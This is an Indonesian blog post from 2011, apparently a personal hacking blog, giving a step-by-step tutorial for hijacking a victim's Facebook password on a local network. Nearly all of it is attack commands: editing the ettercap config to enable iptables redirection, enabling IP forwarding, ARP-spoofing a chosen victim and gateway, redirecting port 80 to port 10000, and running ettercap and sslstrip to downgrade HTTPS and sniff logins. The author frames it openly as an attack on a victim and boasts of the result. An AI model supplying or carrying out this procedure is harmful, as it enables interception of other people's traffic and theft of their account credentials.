Searching...
August 3, 2011
Wednesday, August 03, 2011

SSL Strip Hijack Facebook Password

Oke, dalam kesempatan ini saya sedang malas membuat kalimat pembuka, jadi kita langsung saja ke pesta.

Pertama, cek konfigurasi Ettercap dengan memasukan command ini di terminal:


Code:
root@metasploit:~# gedit /etc/etter.conf


Kemudian cek baris ke 167:



File:
# if you use iptables:   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"



Hapus karakter pagar di depan line ke 168: "#redir command on ....", sehingga menjadi:


File:
# if you use iptables:   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


Save, lalu kita akan menuju tahap kedua. Masukan perintah ini dengan menggunakan terminal:


Code:
root@metasploit:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Kemudian:



Code:
root@metasploit:~# arpspoof -i wlan0 -t [ipaddress korban] [default gateway korban]

Jika berhasil, maka terminal akan tampak seperti ini:



Kemudian kita akan melakukan proses routing, dimana korban akan dialihkan ke suatu ip address atai port yang telah ditentukan oleh penyerang. Masukan kode berikut. [Catatan: Jangan hentikan proses arpspoof, buat tab baru, atau buka terminal baru untuk melakukan proses routing]



Code:
root@metasploit:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000


Kemudian:



Code:
root@metasploit:~# ettercap -T -q -i wlan0







Pada tahap ini korban tidak akan bisa menuju web manapun yang menggunakan koneksi SSL atau HTTPS karena sudah dirouting ke port 10000. Disaat krusial ini, kita membutuhkan bantuan SSLstrip untuk mengijinkan korban mengakses HTTPS dengan syarat kebobolan password. Masukan kode berikut:



Code:
root@metasploit:~# sslstrip -a -k -f




Kemudian kita sniffing kembali koneksi yang terjadi pada ip address korban dengan bantuan ettercap. Anda tidak akan percaya dengan apa yang sudah saya lakukan. Berikut screenshoot korban yang saya dapatkan.




red-dragon

0 comment:

Post a Comment

 
Back to top!